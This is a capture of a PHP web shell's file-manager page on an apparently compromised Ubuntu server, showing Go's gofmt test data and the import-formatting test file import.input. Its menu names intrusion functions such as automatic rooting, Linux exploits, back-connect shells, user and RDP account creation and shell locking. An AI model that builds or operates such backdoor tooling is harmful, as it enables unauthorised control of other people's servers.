Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
go /
src /
cmd /
gofmt /
testdata /
[ HOME SHELL ]
Name
Size
Permission
Action
comments.golden
76
B
-rw-r--r--
comments.input
76
B
-rw-r--r--
composites.golden
2.54
KB
-rw-r--r--
composites.input
3.16
KB
-rw-r--r--
crlf.golden
234
B
-rw-r--r--
crlf.input
247
B
-rw-r--r--
emptydecl.golden
140
B
-rw-r--r--
emptydecl.input
148
B
-rw-r--r--
go2numbers.golden
1.9
KB
-rw-r--r--
go2numbers.input
1.96
KB
-rw-r--r--
import.golden
2.1
KB
-rw-r--r--
import.input
2.1
KB
-rw-r--r--
issue28082.golden
249
B
-rw-r--r--
issue28082.input
447
B
-rw-r--r--
ranges.golden
307
B
-rw-r--r--
ranges.input
304
B
-rw-r--r--
rewrite1.golden
248
B
-rw-r--r--
rewrite1.input
248
B
-rw-r--r--
rewrite10.golden
350
B
-rw-r--r--
rewrite10.input
350
B
-rw-r--r--
rewrite2.golden
407
B
-rw-r--r--
rewrite2.input
406
B
-rw-r--r--
rewrite3.golden
422
B
-rw-r--r--
rewrite3.input
422
B
-rw-r--r--
rewrite4.golden
1.04
KB
-rw-r--r--
rewrite4.input
1.12
KB
-rw-r--r--
rewrite5.golden
446
B
-rw-r--r--
rewrite5.input
538
B
-rw-r--r--
rewrite6.golden
463
B
-rw-r--r--
rewrite6.input
463
B
-rw-r--r--
rewrite7.golden
466
B
-rw-r--r--
rewrite7.input
472
B
-rw-r--r--
rewrite8.golden
292
B
-rw-r--r--
rewrite8.input
300
B
-rw-r--r--
rewrite9.golden
228
B
-rw-r--r--
rewrite9.input
238
B
-rw-r--r--
slices1.golden
927
B
-rw-r--r--
slices1.input
957
B
-rw-r--r--
stdin1.golden
32
B
-rw-r--r--
stdin1.input
32
B
-rw-r--r--
stdin2.golden
101
B
-rw-r--r--
stdin2.input
101
B
-rw-r--r--
stdin3.golden
101
B
-rw-r--r--
stdin3.input
96
B
-rw-r--r--
stdin4.golden
38
B
-rw-r--r--
stdin4.input
39
B
-rw-r--r--
stdin5.golden
55
B
-rw-r--r--
stdin5.input
54
B
-rw-r--r--
stdin6.golden
199
B
-rw-r--r--
stdin6.input
217
B
-rw-r--r--
stdin7.golden
342
B
-rw-r--r--
stdin7.input
296
B
-rw-r--r--
typealias.golden
365
B
-rw-r--r--
typealias.input
360
B
-rw-r--r--
typeswitch.golden
1.44
KB
-rw-r--r--
typeswitch.input
1.44
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : import.input
// package comment package main import ( "fmt" "math" "log" "errors" "io" ) import ( "fmt" "math" "log" "errors" "io" ) // We reset the line numbering to test that // the formatting works independent of line directives //line :19 import ( "fmt" "math" "log" "errors" "io" "fmt" "math" "log" "errors" "io" ) import ( // a block with comments "fmt" // for Printf "math" "log" // for Fatal "errors" "io" // for Reader ) import ( "fmt" // for Printf "math" "log" // for Fatal "errors" "io" // for Reader ) import ( // for Printf "fmt" "math" // for Fatal "log" "errors" // for Reader "io" ) import ( "fmt" // for Printf "math" "log" // for Fatal "errors" "io" // for Reader "fmt" // for Printf "math" "log" // for Fatal "errors" "io" // for Reader ) import ( "fmt" // for Printf "math" "log" // for Fatal "errors" "io" // for Reader "fmt" // for Printf "math" "log" // for Fatal "errors" "io" // for Reader ) // Test deduping and extended sorting import ( "B" // B a "A" // aA b "A" // bA2 b "A" // bA1 . "B" // .B . "B" "C" "C" "C" a "D" // aD "B" _ "B" // _b ) import ( "dedup_by_group" "dedup_by_group" "dedup_by_group" ) import ( /* comment */ io1 "io" "fmt" // for Printf /* comment */ "log" /* comment */ io2 "io" ) import ( /* comment */ io2 "io" // hello /* comment */ io1 "io" "math" /* right side */ "fmt" // end ) import ( /* comment */ io1 "io" /* before */ // after "fmt" "errors" // for New io2 "io" // another // end ) import ( /* left */ "fmt" /* right */ "errors" // for New /* left */ "math" /* right */ "log" // for Fatal ) import /* why */ /* comment here? */ ( /* comment */ "fmt" "math" ) // Reset it again //line :100 // Dedup with different import styles import ( "path" . "path" _ "path" "path" pathpkg "path" ) /* comment */ import ( "math" // for Abs "fmt" // This is a new run "errors" "fmt" "errors" ) // End an import declaration in the same line // as the last import. See golang.org/issue/33538. // Note: Must be the last (or 2nd last) line of the file. import("fmt" "math")
Close